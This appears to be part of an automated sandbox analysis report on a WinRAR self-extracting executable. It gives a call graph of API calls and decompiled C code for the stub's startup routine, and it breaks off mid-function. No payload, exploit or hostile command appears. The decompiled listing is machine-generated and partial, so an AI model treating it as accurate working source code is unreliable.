cdf49d 25013 cddf1e 24981->25013 24986 cdf4b1 24986->24966 24987 cdf4b5 24986->24987 24988 cdf4be 24987->24988 25063 ce7efb 28 API calls _abort 24987->25063 25064 cdf048 12 API calls ___scrt_uninitialize_crt 24988->25064 24991 cdf4c6 24991->24974 24993 cdeee0 24992->24993 25067 cdf654 IsProcessorFeaturePresent 24993->25067 24995 cdeeec 25068 ce2a5e 24995->25068 24997 cdeef1 25002 cdeef5 24997->25002 25076 ce8977 24997->25076 25000 cdef0c 25000->24963 25002->24963 25004 ce8b04 25003->25004 25005 cdfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25004->25005 25006 cdf408 25005->25006 25006->24974 25007 ce8a91 25006->25007 25009 ce8ac0 25007->25009 25008 cdfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25010 ce8ae9 25008->25010 25009->25008 25010->24979 25011->24978 25012->24981 25127 cd0863 25013->25127 25017 cddf3d 25176 cdac16 25017->25176 25019 cddf46 __cftof 25020 cddf59 GetCommandLineW 25019->25020 25021 cddf68 25020->25021 25022 cddfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 25020->25022 25180 cdc5c4 25021->25180 25023 cc4092 _swprintf 51 API calls 25022->25023 25025 cde04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 25023->25025 25191 cdb6dd LoadBitmapW 25025->25191 25027 cddf76 OpenFileMappingW 25030 cddf8f MapViewOfFile 25027->25030 25031 cddfd6 CloseHandle 25027->25031 25028 cddfe0 25185 cddbde 25028->25185 25035 cddfcd UnmapViewOfFile 25030->25035 25036 cddfa0 __InternalCxxFrameHandler 25030->25036 25031->25022 25035->25031 25040 cddbde 2 API calls 25036->25040 25042 cddfbc 25040->25042 25041 cd90b7 8 API calls 25043 cde0aa DialogBoxParamW 25041->25043 25042->25035 25044 cde0e4 25043->25044 25045 cde0f6 Sleep 25044->25045 25046 cde0fd 25044->25046 25045->25046 25048 cde10b 25046->25048 25221 cdae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 25046->25221 25049 cde12a DeleteObject 25048->25049 25050 cde13f DeleteObject 25049->25050 25051 cde146 25049->25051 25050->25051 25052 cde189 25051->25052 25053 cde177 25051->25053 25218 cdac7c 25052->25218 25222 cddc3b 6 API calls 25053->25222 25056 cde17d CloseHandle 25056->25052 25057 cde1c3 25062 cdf993 GetModuleHandleW 25057->25062 25352 ce7cd5 25058->25352 25061->24976 25062->24986 25063->24988 25064->24991 25065->24966 25067->24995 25080 ce3b07 25068->25080 25071 ce2a67 25071->24997 25073 ce2a6f 25074 ce2a7a 25073->25074 25094 ce3b43 DeleteCriticalSection 25073->25094 25074->24997 25123 cec05a 25076->25123 25079 ce2a7d 7 API calls 2 library calls 25079->25002 25081 ce3b10 25080->25081 25083 ce3b39 25081->25083 25084 ce2a63 25081->25084 25095 ce3d46 25081->25095 25100 ce3b43 DeleteCriticalSection 25083->25100 25084->25071 25086 ce2b8c 25084->25086 25116 ce3c57 25086->25116 25090 ce2baf 25091 ce2bbc 25090->25091 25122 ce2bbf 6 API calls ___vcrt_FlsFree 25090->25122 25091->25073 25093 ce2ba1 25093->25073 25094->25071 25101 ce3c0d 25095->25101 25098 ce3d7e InitializeCriticalSectionAndSpinCount 25099 ce3d69 25098->25099 25099->25081 25100->25084 25102 ce3c26 25101->25102 25103 ce3c4f 25101->25103 25102->25103 25108 ce3b72 25102->25108 25103->25098 25103->25099 25106 ce3c3b GetProcAddress 25106->25103 25107 ce3c49 25106->25107 25107->25103 25114 ce3b7e ___vcrt_FlsGetValue 25108->25114 25109 ce3bf3 25109->25103 25109->25106 25110 ce3b95 LoadLibraryExW 25111 ce3bfa 25110->25111 25112 ce3bb3 GetLastError 25110->25112 25111->25109 25113 ce3c02 FreeLibrary 25111->25113 25112->25114 25113->25109 25114->25109 25114->25110 25115 ce3bd5 LoadLibraryExW 25114->25115 25115->25111 25115->25114 25117 ce3c0d ___vcrt_FlsGetValue 5 API calls 25116->25117 25118 ce3c71 25117->25118 25119 ce3c8a TlsAlloc 25118->25119 25120 ce2b96 25118->25120 25120->25093 25121 ce3d08 6 API calls ___vcrt_FlsGetValue 25120->25121 25121->25090 25122->25093 25126 cec073 25123->25126 25124 cdfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25125 cdeefe 25124->25125 25125->25000 25125->25079 25126->25124 25128 cdec50 25127->25128 25129 cd086d GetModuleHandleW 25128->25129 25130 cd0888 GetProcAddress 25129->25130 25131 cd08e7 25129->25131 25132 cd08b9 GetProcAddress 25130->25132 25133 cd08a1 25130->25133 25134 cd0c14 GetModuleFileNameW 25131->25134 25232 ce75fb 42 API calls 2 library calls 25131->25232 25142 cd08cb 25132->25142 25133->25132 25135 cd0c32 25134->25135 25146 cd0c94 GetFileAttributesW 25135->25146 25148 cd0c5d CompareStringW 25135->25148 25149 cd0cac 25135->25149 25223 ccb146 25135->25223 25226 cd081b 25135->25226 25137 cd0b54 25137->25134 25138 cd0b5f GetModuleFileNameW CreateFileW 25137->25138 25139 cd0b8f SetFilePointer 25138->25139 25140 cd0c08 CloseHandle 25138->25140 25139->25140 25141 cd0b9d ReadFile 25139->25141 25140->25134 25141->25140 25145 cd0bbb 25141->25145 25142->25131 25145->25140 25147 cd081b 2 API calls 25145->25147 25146->25135 25146->25149 25147->25145 25148->25135 25150 cd0cb7 25149->25150 25153 cd0cec 25149->25153 25152 cd0cd0 GetFileAttributesW 25150->25152 25154 cd0ce8 25150->25154 25151 cd0dfb 25175 cda64d GetCurrentDirectoryW 25151->25175 25152->25150 25152->25154 25153->25151 25155 ccb146 GetVersionExW 25153->25155 25154->25153 25156 cd0d06 25155->25156 25157 cd0d0d 25156->25157 25158 cd0d73 25156->25158 25160 cd081b 2 API calls 25157->25160 25159 cc4092 _swprintf 51 API calls 25158->25159 25161 cd0d9b AllocConsole 25159->25161 25162 cd0d17 25160->25162 25163 cd0da8 GetCurrentProcessId AttachConsole 25161->25163 25164 cd0df3 ExitProcess 25161->25164 25165 cd081b 2 API calls 25162->25165 25233 ce3e13 25163->25233 25167 cd0d21 25165->25167 25169 cce617 53 API calls 25167->25169 25168 cd0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25168->25164 25170 cd0d3c 25169->25170 25171 cc4092 _swprintf 51 API calls 25170->25171 25172 cd0d4f 25171->25172 25173 cce617 53 API calls 25172->25173 25174 cd0d5e 25173->25174 25174->25164 25175->25017 25177 cd081b 2 API calls 25176->25177 25178 cdac2a OleInitialize 25177->25178 25179 cdac4d GdiplusStartup SHGetMalloc 25178->25179 25179->25019 25183 cdc5ce 25180->25183 25181 cdc6e4 25181->25027 25181->25028 25182 cd1fac CharUpperW 25182->25183 25183->25181 25183->25182 25235 ccf3fa 82 API calls 2 library calls 25183->25235 25186 cdec50 25185->25186 25187 cddbeb SetEnvironmentVariableW 25186->25187 25189 cddc0e 25187->25189 25188 cddc36 25188->25022 25189->25188 25190 cddc2a SetEnvironmentVariableW 25189->25190 25190->25188 25192 cdb6fe 25191->25192 25193 cdb70b GetObjectW 25191->25193 25236 cda6c2 FindResourceW 25192->25236 25195 cdb71a 25193->25195 25197 cda5c6 4 API calls 25195->25197 25200 cdb72d 25197->25200 25198 cdb770 25210 ccda42 25198->25210 25199 cdb74c 25250 cda605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25199->25250 25200->25198 25200->25199 25202 cda6c2 12 API calls 25200->25202 25204 cdb73d 25202->25204 25203 cdb754 25251 cda5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25203->25251 25204->25199 25206 cdb743 DeleteObject 25204->25206 25206->25199 25207 cdb75d 25252 cda80c 8 API calls 25207->25252 25209 cdb764 DeleteObject 25209->25198 25261 ccda67 25210->25261 25215 cd90b7 25216 cdeb38 8 API calls 25215->25216 25217 cd90d6 25216->25217 25217->25041 25219 cdacab GdiplusShutdown OleUninitialize 25218->25219 25219->25057 25221->25048 25222->25056 25224 ccb15a GetVersionExW 25223->25224 25225 ccb196 25223->25225 25224->25225 25225->25135 25227 cdec50 25226->25227 25228 cd0828 GetSystemDirectoryW 25227->25228 25229 cd085e 25228->25229 25230 cd0840 25228->25230 25229->25135 25231 cd0851 LoadLibraryW 25230->25231 25231->25229 25232->25137 25234 ce3e1b 25233->25234 25234->25168 25234->25234 25235->25183 25237 cda7d3 25236->25237 25238 cda6e5 SizeofResource 25236->25238 25237->25193 25237->25195 25238->25237 25239 cda6fc LoadResource 25238->25239 25239->25237 25240 cda711 LockResource 25239->25240 25240->25237 25241 cda722 GlobalAlloc 25240->25241 25241->25237 25242 cda73d GlobalLock 25241->25242 25243 cda7cc GlobalFree 25242->25243 25244 cda74c __InternalCxxFrameHandler 25242->25244 25243->25237 25245 cda7c5 GlobalUnlock 25244->25245 25253 cda626 GdipAlloc 25244->25253 25245->25243 25248 cda79a GdipCreateHBITMAPFromBitmap 25249 cda7b0 25248->25249 25249->25245 25250->25203 25251->25207 25252->25209 25254 cda638 25253->25254 25255 cda645 25253->25255 25257 cda3b9 25254->25257 25255->25245 25255->25248 25255->25249 25258 cda3da GdipCreateBitmapFromStreamICM 25257->25258 25259 cda3e1 GdipCreateBitmapFromStream 25257->25259 25260 cda3e6 25258->25260 25259->25260 25260->25255 25262 ccda75 __EH_prolog 25261->25262 25263 ccdaa4 GetModuleFileNameW 25262->25263 25264 ccdad5 25262->25264 25265 ccdabe 25263->25265 25307 cc98e0 25264->25307 25265->25264 25267 cc959a 80 API calls 25269 ccda4e 25267->25269 25268 ccdb31 25318 ce6310 25268->25318 25305 cce29e GetModuleHandleW FindResourceW 25269->25305 25271 cce261 78 API calls 25272 ccdb05 25271->25272 25272->25268 25272->25271 25285 ccdd4a 25272->25285 25273 ccdb44 25274 ce6310 26 API calls 25273->25274 25282 ccdb56 ___vcrt_FlsGetValue 25274->25282 25275 ccdc85 25275->25285 25338 cc9d70 81 API calls 25275->25338 25277 cc9e80 79 API calls 25277->25282 25279 ccdc9f ___std_exception_copy 25280 cc9bd0 82 API calls 25279->25280 25279->25285 25283 ccdcc8 ___std_exception_copy 25280->25283 25282->25275 25282->25277 25282->25285 25332 cc9bd0 25282->25332 25337 cc9d70 81 API calls 25282->25337 25283->25285 25302 ccdcd3 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 25283->25302 25339 cd1b84 MultiByteToWideChar 25283->25339 25285->25267 25286 cce159 25290 cce1de 25286->25290 25345 ce8cce 26 API calls 2 library calls 25286->25345 25288 cce16e 25346 ce7625 26 API calls 2 library calls 25288->25346 25291 cce214 25290->25291 25297 cce261 78 API calls 25290->25297 25295 ce6310 26 API calls 25291->25295 25293 cce1c6 25347 cce27c 78 API calls 25293->25347 25296 cce22d 25295->25296 25298 ce6310 26 API calls 25296->25298 25297->25290 25298->25285 25300 cd1da7 WideCharToMultiByte 25300->25302 25302->25285 25302->25286 25302->25300 25340 cce5b1 50 API calls __vsnprintf 25302->25340 25341 ce6159 26 API calls 3 library calls 25302->25341 25342 ce8cce 26 API calls 2 library calls 25302->25342 25343 ce7625 26 API calls 2 library calls 25302->25343 25344 cce27c 78 API calls 25302->25344 25306 ccda55 25305->25306 25306->25215 25309 cc98ea 25307->25309 25308 cc994b CreateFileW 25310 cc996c GetLastError 25308->25310 25313 cc99bb 25308->25313 25309->25308 25311 ccbb03 GetCurrentDirectoryW 25310->25311 25312 cc998c 25311->25312 25312->25313 25314 cc9990 CreateFileW GetLastError 25312->25314 25315 cc99ff 25313->25315 25317 cc99e5 SetFileTime 25313->25317 25314->25313 25316 cc99b5 25314->25316 25315->25272 25316->25313 25317->25315 25319 ce6349 25318->25319 25320 ce634d 25319->25320 25331 ce6375 25319->25331 25348 ce91a8 20 API calls __dosmaperr 25320->25348 25322 ce6699 25324 cdfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25322->25324 25323 ce6352 25349 ce9087 26 API calls __cftof 25323->25349 25326 ce66a6 25324->25326 25326->25273 25327 ce635d 25328 cdfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25327->25328 25329 ce6369 25328->25329 25329->25273 25331->25322 25350 ce6230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25331->25350 25333 cc9bdc 25332->25333 25336 cc9be3 25332->25336 25333->25282 25335 cc9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25335->25336 25336->25333 25336->25335 25351 cc6d1a 77 API calls 25336->25351 25337->25282 25338->25279 25339->25302 25340->25302 25341->25302 25342->25302 25343->25302 25344->25302 25345->25288 25346->25293 25347->25290 25348->25323 25349->25327 25350->25331 25351->25336 25353 ce7ce1 _abort 25352->25353 25354 ce7cfa 25353->25354 25355 ce7ce8 25353->25355 25376 ceac31 EnterCriticalSection 25354->25376 25388 ce7e2f GetModuleHandleW 25355->25388 25358 ce7ced 25358->25354 25389 ce7e73 GetModuleHandleExW 25358->25389 25359 ce7d9f 25377 ce7ddf 25359->25377 25364 ce7d76 25365 ce7d8e 25364->25365 25371 ce8a91 _abort 5 API calls 25364->25371 25372 ce8a91 _abort 5 API calls 25365->25372 25366 ce7d01 25366->25359 25366->25364 25397 ce87e0 20 API calls _abort 25366->25397 25367 ce7dbc 25380 ce7dee 25367->25380 25368 ce7de8 25398 cf2390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25368->25398 25371->25365 25372->25359 25376->25366 25399 ceac81 LeaveCriticalSection 25377->25399 25379 ce7db8 25379->25367 25379->25368 25400 ceb076 25380->25400 25383 ce7e1c 25386 ce7e73 _abort 8 API calls 25383->25386 25384 ce7dfc GetPEB 25384->25383 25385 ce7e0c GetCurrentProcess TerminateProcess 25384->25385 25385->25383 25387 ce7e24 ExitProcess 25386->25387 25388->25358 25390 ce7e9d GetProcAddress 25389->25390 25391 ce7ec0 25389->25391 25392 ce7eb2 25390->25392 25393 ce7ecf 25391->25393 25394 ce7ec6 FreeLibrary 25391->25394 25392->25391 25395 cdfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25393->25395 25394->25393 25396 ce7cf9 25395->25396 25396->25354 25397->25364 25399->25379 25401 ceb09b 25400->25401 25402 ceb091 25400->25402 25403 ceac98 __dosmaperr 5 API calls 25401->25403 25404 cdfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25402->25404 25403->25402 25405 ce7df8 25404->25405 25405->25383 25405->25384 23481 cde44b 23482 cde3f4 23481->23482 23484 cde85d 23482->23484 23510 cde5bb 23484->23510 23486 cde86d 23487 cde8ca 23486->23487 23498 cde8ee 23486->23498 23488 cde7fb DloadReleaseSectionWriteAccess 6 API calls 23487->23488 23489 cde8d5 RaiseException 23488->23489 23503 cdeac3 23489->23503 23490 cde9d9 23494 cdea95 23490->23494 23497 cdea37 GetProcAddress 23490->23497 23491 cde966 LoadLibraryExA 23492 cde979 GetLastError 23491->23492 23493 cde9c7 23491->23493 23496 cde9a2 23492->23496 23507 cde98c 23492->23507 23493->23490 23495 cde9d2 FreeLibrary 23493->23495 23519 cde7fb 23494->23519 23495->23490 23499 cde7fb DloadReleaseSectionWriteAccess 6 API calls 23496->23499 23497->23494 23500 cdea47 GetLastError 23497->23500 23498->23490 23498->23491 23498->23493 23498->23494 23501 cde9ad RaiseException 23499->23501 23505 cdea5a 23500->23505 23501->23503 23503->23482 23504 cde7fb DloadReleaseSectionWriteAccess 6 API calls 23506 cdea7b RaiseException 23504->23506 23505->23494 23505->23504 23508 cde5bb ___delayLoadHelper2@8 6 API calls 23506->23508 23507->23493 23507->23496 23509 cdea92 23508->23509 23509->23494 23511 cde5ed 23510->23511 23512 cde5c7 23510->23512 23511->23486 23527 cde664 23512->23527 23514 cde5cc 23516 cde5e8 23514->23516 23530 cde78d 23514->23530 23535 cde5ee GetModuleHandleW GetProcAddress GetProcAddress 23516->23535 23518 cde836 23518->23486 23520 cde80d 23519->23520 23521 cde82f 23519->23521 23522 cde664 DloadReleaseSectionWriteAccess 3 API calls 23520->23522 23521->23503 23523 cde812 23522->23523 23524 cde82a 23523->23524 23525 cde78d DloadProtectSection 3 API calls 23523->23525 23538 cde831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23524->23538 23525->23524 23536 cde5ee GetModuleHandleW GetProcAddress GetProcAddress 23527->23536 23529 cde669 23529->23514 23532 cde7a2 DloadProtectSection 23530->23532 23531 cde7dd VirtualProtect 23533 cde7a8 23531->23533 23532->23531 23532->23533 23537 cde6a3 VirtualQuery GetSystemInfo 23532->23537 23533->23516 23535->23518 23536->23529 23537->23531 23538->23521 25423 cda440 GdipCloneImage GdipAlloc 25475 ce3a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25493 cf1f40 CloseHandle 23669 cdcd58 23671 cdce22 23669->23671 23676 cdcd7b 23669->23676 23672 cdc793 _wcslen _wcsrchr 23671->23672 23697 cdd78f 23671->23697 23674 cdd40a 23672->23674 23678 cdca67 SetWindowTextW 23672->23678 23683 cdc855 SetFileAttributesW 23672->23683 23688 cdcc31 GetDlgItem SetWindowTextW SendMessageW 23672->23688 23691 cdcc71 SendMessageW 23672->23691 23696 cd1fbb CompareStringW 23672->23696 23721 cdb314 23672->23721 23725 cda64d GetCurrentDirectoryW 23672->23725 23727 cca5d1 6 API calls 23672->23727 23728 cca55a FindClose 23672->23728 23729 cdb48e 76 API calls 2 library calls 23672->23729 23730 ce3e3e 23672->23730 23676->23671 23677 cd1fbb CompareStringW 23676->23677 23677->23676 23678->23672 23685 cdc90f GetFileAttributesW 23683->23685 23695 cdc86f __cftof _wcslen 23683->23695 23685->23672 23687 cdc921 DeleteFileW 23685->23687 23687->23672 23689 cdc932 23687->23689 23688->23672 23690 cc4092 _swprintf 51 API calls 23689->23690 23692 cdc952 GetFileAttributesW 23690->23692 23691->23672 23692->23689 23693 cdc967 MoveFileW 23692->23693 23693->23672 23694 cdc97f MoveFileExW 23693->23694 23694->23672 23695->23672 23695->23685 23726 ccb991 51 API calls 2 library calls 23695->23726 23696->23672 23699 cdd799 __cftof _wcslen 23697->23699 23698 cdd9e7 23698->23672 23699->23698 23700 cdd8a5 23699->23700 23701 cdd9c0 23699->23701 23746 cd1fbb CompareStringW 23699->23746 23743 cca231 23700->23743 23701->23698 23705 cdd9de ShowWindow 23701->23705 23705->23698 23706 cdd8d9 ShellExecuteExW 23706->23698 23711 cdd8ec 23706->23711 23708 cdd8d1 23708->23706 23709 cdd925 23748 cddc3b 6 API calls 23709->23748 23710 cdd97b CloseHandle 23712 cdd989 23710->23712 23713 cdd994 23710->23713 23711->23709 23711->23710 23714 cdd91b ShowWindow 23711->23714 23749 cd1fbb CompareStringW 23712->23749 23713->23701 23714->23709 23717 cdd93d 23717->23710 23718 cdd950 GetExitCodeProcess 23717->23718 23718->23710 23719 cdd963 23718->23719 23719->23710 23722 cdb31e 23721->23722 23723 cdb3f0 ExpandEnvironmentStringsW 23722->23723 23724 cdb40d 23722->23724 23723->23724 23724->23672 23725->23672 23726->23695 23727->23672 23728->23672 23729->23672 23731 ce8e54 23730->23731 23732 ce8e6c 23731->23732 23733 ce8e61 23731->23733 23735 ce8e74 23732->23735 23741 ce8e7d __dosmaperr 23732->23741 23764 ce8e06 23733->23764 23739 ce8dcc _free 20 API calls 23735->23739 23736 ce8ea7 RtlReAllocateHeap 23738 ce8e69 23736->23738 23736->23741 23737 ce8e82 23771 ce91a8 20 API calls __dosmaperr 23737->23771 23738->23672 23739->23738 23741->23736 23741->23737 23772 ce7a5e 7 API calls 2 library calls 23741->23772 23750 cca243 23743->23750 23746->23700 23747 ccb6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23747->23708 23748->23717 23749->23713 23758 cdec50 23750->23758 23753 cca23a 23753->23706 23753->23747 23754 cca261 23760 ccbb03 23754->23760 23756 cca275 23756->23753 23757 cca279 GetFileAttributesW 23756->23757 23757->23753 23759 cca250 GetFileAttributesW 23758->23759 23759->23753 23759->23754 23761 ccbb10 _wcslen 23760->23761 23762 ccbbb8 GetCurrentDirectoryW 23761->23762 23763 ccbb39 _wcslen 23761->23763 23762->23763 23763->23756 23765 ce8e44 23764->23765 23766 ce8e14 __dosmaperr 23764->23766 23774 ce91a8 20 API calls __dosmaperr 23765->23774 23766->23765 23767 ce8e2f RtlAllocateHeap 23766->23767 23773 ce7a5e 7 API calls 2 library calls 23766->23773 23767->23766 23769 ce8e42 23767->23769 23769->23738 23771->23738 23772->23741 23773->23766 23774->23769 25424 cde455 14 API calls ___delayLoadHelper2@8 25494 ce7f6e 52 API calls 2 library calls 25477 ce8268 55 API calls _free 25426 cdc793 107 API calls 4 library calls 24733 cc9f7a 24734 cc9f8f 24733->24734 24735 cc9f88 24733->24735 24736 cc9f9c GetStdHandle 24734->24736 24743 cc9fab 24734->24743 24736->24743 24737 cca003 WriteFile 24737->24743 24738 cc9fcf 24739 cc9fd4 WriteFile 24738->24739 24738->24743 24739->24738 24739->24743 24741 cca095 24745 cc6e98 77 API calls 24741->24745 24743->24735 24743->24737 24743->24738 24743->24739 24743->24741 24744 cc6baa 78 API calls 24743->24744 24744->24743 24745->24735 24746 cc9a74 24749 cc9a7e 24746->24749 24747 cc9b9d SetFilePointer 24748 cc9bb6 GetLastError 24747->24748 24752 cc9ab1 24747->24752 24748->24752 24749->24747 24750 cc981a 79 API calls 24749->24750 24751 cc9b79 24749->24751 24749->24752 24750->24751 24751->24747 25428 cc1075 84 API calls 25429 cda070 10 API calls 25478 cdb270 99 API calls 25496 cc1f72 128 API calls __EH_prolog 25431 cda400 GdipDisposeImage GdipFree 25479 cdd600 70 API calls 25432 ce6000 QueryPerformanceFrequency QueryPerformanceCounter 25461 ce2900 6 API calls 4 library calls 25480 cef200 51 API calls 25497 cea700 21 API calls 25499 cc1710 86 API calls 25464 cdad10 73 API calls 25436 cc1025 29 API calls 25481 cdc220 93 API calls _swprintf 25438 cef421 21 API calls __vswprintf_c_l 25465 cdf530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25502 cdff30 LocalFree 24833 cebb30 24834 cebb42 24833->24834 24835 cebb39 24833->24835 24837 ceba27 24835->24837 24838 ce97e5 _abort 38 API calls 24837->24838 24839 ceba34 24838->24839 24857 cebb4e 24839->24857 24841 ceba3c 24866 ceb7bb 24841->24866 24844 ceba53 24844->24834 24845 ce8e06 __vswprintf_c_l 21 API calls 24846 ceba64 24845->24846 24847 ceba96 24846->24847 24873 cebbf0 24846->24873 24850 ce8dcc _free 20 API calls 24847->24850 24850->24844 24851 ceba91 24883 ce91a8 20 API calls __dosmaperr 24851->24883 24853 cebada 24853->24847 24884 ceb691 26 API calls 24853->24884 24854 cebaae 24854->24853 24855 ce8dcc _free 20 API calls 24854->24855 24855->24853 24858 cebb5a __FrameHandler3::FrameUnwindToState 24857->24858 24859 ce97e5 _abort 38 API calls 24858->24859 24864 cebb64 24859->24864 24861 cebbe8 _abort 24861->24841 24864->24861 24865 ce8dcc _free 20 API calls 24864->24865 24885 ce8d24 38 API calls _abort 24864->24885 24886 ceac31 EnterCriticalSection 24864->24886 24887 cebbdf LeaveCriticalSection _abort 24864->24887 24865->24864 24867 ce4636 __cftof 38 API calls 24866->24867 24868 ceb7cd 24867->24868 24869 ceb7ee 24868->24869 24870 ceb7dc GetOEMCP 24868->24870 24871 ceb805 24869->24871 24872 ceb7f3 GetACP 24869->24872 24870->24871 24871->24844 24871->24845 24872->24871 24874 ceb7bb 40 API calls 24873->24874 24875 cebc0f 24874->24875 24876 cebc85 __cftof 24875->24876 24877 cebc16 24875->24877 24880 cebc60 IsValidCodePage 24875->24880 24888 ceb893 GetCPInfo 24876->24888 24878 cdfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24877->24878 24879 ceba89 24878->24879 24879->24851 24879->24854 24880->24877 24881 cebc72 GetCPInfo 24880->24881 24881->24876 24881->24877 24883->24847 24884->24847 24886->24864 24887->24864 24893 ceb8cd 24888->24893 24897 ceb977 24888->24897 24890 cdfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24892 ceba23 24890->24892 24892->24877 24898 cec988 24893->24898 24896 ceab78 __vswprintf_c_l 43 API calls 24896->24897 24897->24890 24899 ce4636 __cftof 38 API calls 24898->24899 24900 cec9a8 MultiByteToWideChar 24899->24900 24902 ceca7e 24900->24902 24903 cec9e6 24900->24903 24904 cdfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24902->24904 24905 ce8e06 __vswprintf_c_l 21 API calls 24903->24905 24908 ceca07 __cftof __vsnwprintf_l 24903->24908 24906 ceb92e 24904->24906 24905->24908 24912 ceab78 24906->24912 24907 ceca78 24917 ceabc3 20 API calls _free 24907->24917 24908->24907 24910 ceca4c MultiByteToWideChar 24908->24910 24910->24907 24911 ceca68 GetStringTypeW 24910->24911 24911->24907 24913 ce4636 __cftof 38 API calls 24912->24913 24914 ceab8b 24913->24914 24918 cea95b 24914->24918 24917->24902 24919 cea976 __vswprintf_c_l 24918->24919 24920 cea99c MultiByteToWideChar 24919->24920 24921 cea9c6 24920->24921 24931 ceab50 24920->24931 24923 cea9e7 __vsnwprintf_l 24921->24923 24925 ce8e06 __vswprintf_c_l 21 API calls 24921->24925 24922 cdfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24924 ceab63 24922->24924 24926 ceaa30 MultiByteToWideChar 24923->24926 24941 ceaa9c 24923->24941 24924->24896 24925->24923 24927 ceaa49 24926->24927 24926->24941 24945 ceaf6c 24927->24945 24931->24922 24932 ceaaab 24936 ce8e06 __vswprintf_c_l 21 API calls 24932->24936 24939 ceaacc __vsnwprintf_l 24932->24939 24933 ceaa73 24934 ceaf6c __vswprintf_c_l 11 API calls 24933->24934 24933->24941 24934->24941 24935 ceab41 24953 ceabc3 20 API calls _free 24935->24953 24936->24939 24937 ceaf6c __vswprintf_c_l 11 API calls 24940 ceab20 24937->24940 24939->24935 24939->24937 24940->24935 24942 ceab2f WideCharToMultiByte 24940->24942 24954 ceabc3 20 API calls _free 24941->24954 24942->24935 24943 ceab6f 24942->24943 24955 ceabc3 20 API calls _free 24943->24955 24946 ceac98 __dosmaperr 5 API calls 24945->24946 24947 ceaf93 24946->24947 24950 ceaf9c 24947->24950 24956 ceaff4 10 API calls 3 library calls 24947->24956 24949 ceafdc LCMapStringW 24949->24950 24951 cdfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24950->24951 24952 ceaa60 24951->24952 24952->24932 24952->24933 24952->24941 24953->24941 24954->24931 24955->24941 24956->24949 25440 cec030 GetProcessHeap

                                                    Executed Functions

                                                    Function 00CDDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 17%
                                                    			E00CDDF1E(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t40;
				void* _t41;
				long _t50;
				void* _t53;
				intOrPtr _t57;
				struct HWND__* _t73;
				void* _t74;
				WCHAR* _t92;
				struct HINSTANCE__* _t93;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t120;

				_t120 = __fp0;
				_t86 = __edx;
				E00CD0863(__edx, 1);
				E00CDA64D("C:\Users\alfons\Desktop", 0x800);
				_t75 =  &_v208;
				E00CDAC16( &_v208); // executed
				_t73 = 0;
				E00CDFFF0(0x7104, 0xd17b80, 0, 0x7104);
				_t101 = _t100 + 0xc;
				_t92 = GetCommandLineW();
				_t105 = _t92;
				if(_t92 != 0) {
					_push(_t92);
					E00CDC5C4(0, _t105);
					if( *0xd0a471 == 0) {
						E00CDDBDE(__eflags, _t92); // executed
					} else {
						_t98 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t98 != 0) {
							UnmapViewOfFile(_t74);
							_t73 = 0;
						}
						CloseHandle(_t98);
					}
				}
				GetModuleFileNameW(_t73, 0xd1ec90, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0xd1ec90); // executed
				GetLocalTime(_t101 + 0xc);
				_push( *(_t101 + 0x1a) & 0x0000ffff);
				_push( *(_t101 + 0x1c) & 0x0000ffff);
				_push( *(_t101 + 0x1e) & 0x0000ffff);
				_push( *(_t101 + 0x20) & 0x0000ffff);
				_push( *(_t101 + 0x22) & 0x0000ffff);
				_push( *(_t101 + 0x22) & 0x0000ffff);
				E00CC4092(_t101 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t101 + 0x24) & 0x0000ffff);
				_t102 = _t101 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t102 + 0x7c);
				_t93 = GetModuleHandleW(_t73);
				 *0xd0102c = _t93;
				 *0xd01028 = _t93; // executed
				_t40 = LoadIconW(_t93, 0x64); // executed
				 *0xd17b7c = _t40; // executed
				_t41 = E00CDB6DD(_t75, _t86, _t120); // executed
				 *0xd1ec84 = _t41;
				E00CCDA42(0xd01030, _t86, 0, 0xd1ec90);
				E00CD90B7(0);
				E00CD90B7(0);
				 *0xd08440 = _t102 + 0x5c;
